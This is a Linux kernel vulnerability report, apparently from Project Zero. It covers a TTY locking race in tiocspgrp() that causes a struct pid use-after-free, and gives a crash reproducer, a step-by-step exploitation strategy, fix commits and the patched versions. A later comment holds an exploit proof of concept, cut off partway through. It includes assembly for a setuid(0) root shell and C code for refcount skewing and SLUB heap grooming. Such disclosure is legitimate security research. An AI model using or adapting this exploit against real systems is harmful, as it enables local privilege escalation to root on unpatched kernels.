tiocspgrp(), the handler for the TIOCSPGRP ioctl, has the following signature: static int tiocspgrp(struct tty_struct \*tty, struct tty_struct \*real_tty, pid_t __user \*p) It receives two tty_struct pointers because, for PTY pairs, userspace can use the same ioctl() on both sides of the pair, with slightly different semantics. tty points to the side that userspace passed to ioctl() as file descriptor (either the TTY or the master), while real_tty always points to the TTY. tiocspgrp() contains the following code: static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p) { [...] spin_lock_irq(&tty->ctrl_lock); put_pid(real_tty->pgrp); real_tty->pgrp = get_pid(pgrp); spin_unlock_irq(&tty->ctrl_lock); [...] } It always modifies the ->pgrp of the TTY but, depending on the file descriptor passed in by the caller, sometimes takes the ->ctrl_lock of the master instead. This means that it is possible to race TIOCSPGRP on the master with TIOCSPGRP on the TTY. The following reproducer quickly causes errors (e.g. starting with a "refcount_t: addition on 0; use-after-free." message): ====================================================================== #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include int main(void) { sync(); /* we're probably gonna crash... */ /* * We may already be process group leader but want to be session leader; * therefore, do everything in a child process. */ pid_t main_task = fork(); if (main_task == -1) err(1, "initial fork"); if (main_task != 0) { int status; if (waitpid(main_task, &status, 0) != main_task) err(1, "waitpid main_task"); return 0; } if (prctl(PR_SET_PDEATHSIG, SIGKILL)) err(1, "PR_SET_PDEATHSIG"); if (getppid() == 1) exit(0); /* basic preparation */ if (signal(SIGTTOU, SIG_IGN)) err(1, "signal"); if (setsid() == -1) err(1, "start new session"); /* set up a new pty pair */ int ptmx = open("/dev/ptmx", O_RDWR); if (ptmx == -1) err(1, "open ptmx"); unlockpt(ptmx); int tty = open(ptsname(ptmx), O_RDWR); if (tty == -1) err(1, "open tty"); /* * Let a series of children change the ->pgrp pointer * protected by the tty's ctrl_lock... */ pid_t child = fork(); if (child == -1) err(1, "fork"); if (child == 0) { if (prctl(PR_SET_PDEATHSIG, SIGKILL)) err(1, "PR_SET_PDEATHSIG"); if (getppid() == 1) exit(0); while (1) { pid_t grandchild = fork(); if (grandchild == -1) err(1, "fork grandchild"); if (grandchild == 0) { if (setpgid(0, 0)) err(1, "setpgid"); int pgrp = getpid(); if (ioctl(tty, TIOCSPGRP, &pgrp)) err(1, "TIOCSPGRP (tty)"); exit(0); } int status; if (waitpid(grandchild, &status, 0) != grandchild) err(1, "waitpid for grandchild"); } } /* * ... while the parent changes the same ->pgrp pointer under the * ctrl_lock of the other side of the pty pair. */ while (1) { int pgrp = getpid(); if (ioctl(ptmx, TIOCSPGRP, &pgrp)) err(1, "TIOCSPGRP (ptmx)"); } } This seems to me like it would be fairly promising as a target for exploitation; for example, a strategy along the following lines might work: enter a deeply nested PID namespace, such that you have a SLUB cache like pid_10 to yourself take a bunch of references to two struct pid instances (e.g. through pidfds or procfs?) try to hit the bug in a loop such that the refcounts are hopefully off by a bit, but both struct pid instances still exist on both struct pid, drop references one by one until one is freed to detect reallocation, try to get SLUB to reuse the object for another PID, then check something like pidfd_show_fdinfo() or tiocgsid() on the old pid (which mostly dump plain data from a struct pid without touching other stuff in there) get the entire SLUB high-order page freed, and try to reallocate it into another slab exploit the resulting type confusion, e.g. by changing the refcount of the freed struct pid I haven't tried that yet though. I'm going to send suggested patches for this issue and for less severe TTY locking problems around the ->session pointer in a minute. (The ->session stuff is sufficiently theoretical that it probably doesn't really need the full security treatment, but I figured it'd be less messy if I include both here...) I have done some basic testing of these changes; the only thing that shows up as a problem is a lockdep warning about a possible deadlock when triggering the SAK logic via sysrq (involving console_lock, termios_rwsem and tty_bufhead::lock), but that also happens on master and doesn't seem related to my changes. This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is 2021-03-03. Disclosure at an earlier date is possible if the bug has been fixed in Linux stable releases (per agreement with security@kernel.org folks). Comments ja...@google.com #2Dec 4, 2020 08:41AM My suggested patches just landed in the subsystem tree: main fix: https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty.git/commit/?h=tty-linus&id=54ffccbf053b5b6ca4f6e45094b942fab92a25fc other locking fix: https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty.git/commit/?h=tty-linus&id=c8bcd9c5be24fb9e6132e97da5a35e55a83e36b9 ja...@google.com #3Dec 7, 2020 01:15AM fixes are merged into Linus' tree: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d49248eb25a223b238cd7687ea92b080f595a323 ja...@google.com #4Dec 12, 2020 01:33PM Marked as fixed. Fixed in stable releases from 2020-12-11: 4.4.248 4.9.248 4.14.212 4.19.163 5.4.83 5.9.14 and in mainline in 5.11 ja...@google.com #6Oct 19, 2021 05:02PM ``` user@deb10:~/tiocspgrp$ cat Makefile poc: poc.c rootshell gcc -Wall -o poc poc.c rootshell: rootshell.o ld -o rootshell rootshell.o --nmagic rootshell.o: rootshell.S as -o rootshell.o rootshell.S user@deb10:~/tiocspgrp$ cat rootshell.S .code64 .section .text, "ax" .globl _start _start: /* setuid */ mov $105, %eax mov $0, %edi syscall /* execve */ mov $59, %eax lea shell_str(%rip), %rdi lea argv(%rip), %rsi lea envv(%rip), %rdx syscall int $3 shell_str: .asciz "/bin/bash" argv: .quad shell_str .quad 0 envv: .quad 0 user@deb10:~/tiocspgrp$ cat poc.c #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include /* * How far the refcount of struct pid should be elevated before trying * to skew it down; determined by the multiplication of the two parameters. */ #define SOCKS_FOR_CREDS 100 #define CREDS_PER_SOCKET 100 /* * How often to attempt the race. * If this program crashes in the initial stage, lower this number. * A decent exploit might ramp up this number exponentially, * or something like that. */ #define SKEW_ATTEMPTS 50000 #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1) \ err(1, "SYSCHK(" #x ")"); \ __res; \ }) void pin_cpu(int cpu) { cpu_set_t cpuset; CPU_ZERO(&cpuset); CPU_SET(cpu, &cpuset); SYSCHK(sched_setaffinity(0, sizeof(cpuset), &cpuset)); } /* * We want the child to be able to close its parent's file descriptors. */ #define fork() syscall(__NR_clone, CLONE_FILES|SIGCHLD, NULL, NULL, NULL, 0) static int epfd = -1; /* * Fill one SLUB page (32 objects). * One of the objects is a seq_file (so that we can free it synchronously to * shove the page onto the pcpu partial list), the rest are epoll items because * those aren't as messy in terms of fd usage and such. * Note that we run this without knowing the state of the current SLUB page, so * usually the allocated objects actually span two SLUB pages. * But if you run this repeatedly, each returned seq_file should be on its own * SLUB page, more or less. */ static int fill_one_page(void) { const int DUPFD_COUNT = 31; int fd = SYSCHK(eventfd(0, 0)); int dupfds[DUPFD_COUNT]; for (int i=0; i parent (races, may leave child refcount too low and parent refcount too high) */ SYSCHK(ioctl(tty, TIOCSPGRP, &parent)); *syncptr = 11; } printf("refcount should now be skewed, child exiting\n"); exit(0); } printf("child is %d\n", child); for (int attempts = 0; attempts < SKEW_ATTEMPTS; attempts++) { /* update parent -> child (does not race) */ SYSCHK(ioctl(ptmx, TIOCSPGRP, &child)); *syncptr = 0; while (1) { char syncval = *syncptr; if ((syncval&1) == 1) { *syncptr = syncval + 1; /* at 9, we first bump to 10 so that the child can go ahead, then also go ahead ourselves */ if (syncval == 9) break; } } /* update child -> parent (races, may leave child refcount too low and parent refcount too high) */ SYSCHK(ioctl(ptmx, TIOCSPGRP, &parent)); while (*syncptr != 11) /*wait*/; } int status; pid_t wait_res = waitpid(child, &status, 0); if (wait_res != child) err(1, "wait for child"); if (WIFEXITED(status)) { printf("child exited cleanly\n"); } else { errx(1, "child died weirdly"); } /* drain the CPU slab */ for (int i=32; i<64; i++) seqfiles[i] = SYSCHK(open("/proc/self/maps", O_RDONLY)); /* let's make sure that the child drops its RCU reference on the pid before we do anything else */ await_rcu_call(); printf("gonna try to free the pid...\n"); /* * free the pid and intentionally crash with a sort of double-free (actually * usually because the SLUB freelist pointer clobbers pid->level with garbage) */ *syncptr = 0; pid_t df_child = fork(); if (df_child == -1) err(1, "fork"); if (df_child == 0) { for (int sockidx = 0; sockidx < SOCKS_FOR_CREDS; sockidx++) { for (int refs = 0; refs < CREDS_PER_SOCKET; refs++) { char dummy; if (read(sockpair_refhold[sockidx][1], &dummy, 1) != 1) err(1, "read from sockpair_refhold failed with syscall return???"); (*syncptr)++; } } errx(1, "unexpectedly all socket data was flushed out successfully?"); } int df_status; if (waitpid(df_child, &df_status, 0) != df_child) err(1, "waitpid"); if (!WIFSIGNALED(df_status)) errx(1, "double-free child did not die due to signal?"); printf("double-free child died with signal %d after dropping %d references (%d%%)\n", WTERMSIG(df_status), *syncptr, 100 * (*syncptr) / (SOCKS_FOR_CREDS * CREDS_PER_SOCKET)); /* free all allocations in the slab page, putting it on the pcpu partial list */ for (int i=0; i<64; i++) SYSCHK(close(seqfiles[i])); /* * Flush the pcpu partial list. * Our slab page should get freed onto the percpu order-0 page freelist * for nonmovable zone-normal pages; the others stay because they still have * active allocations. */ for (int i=0; i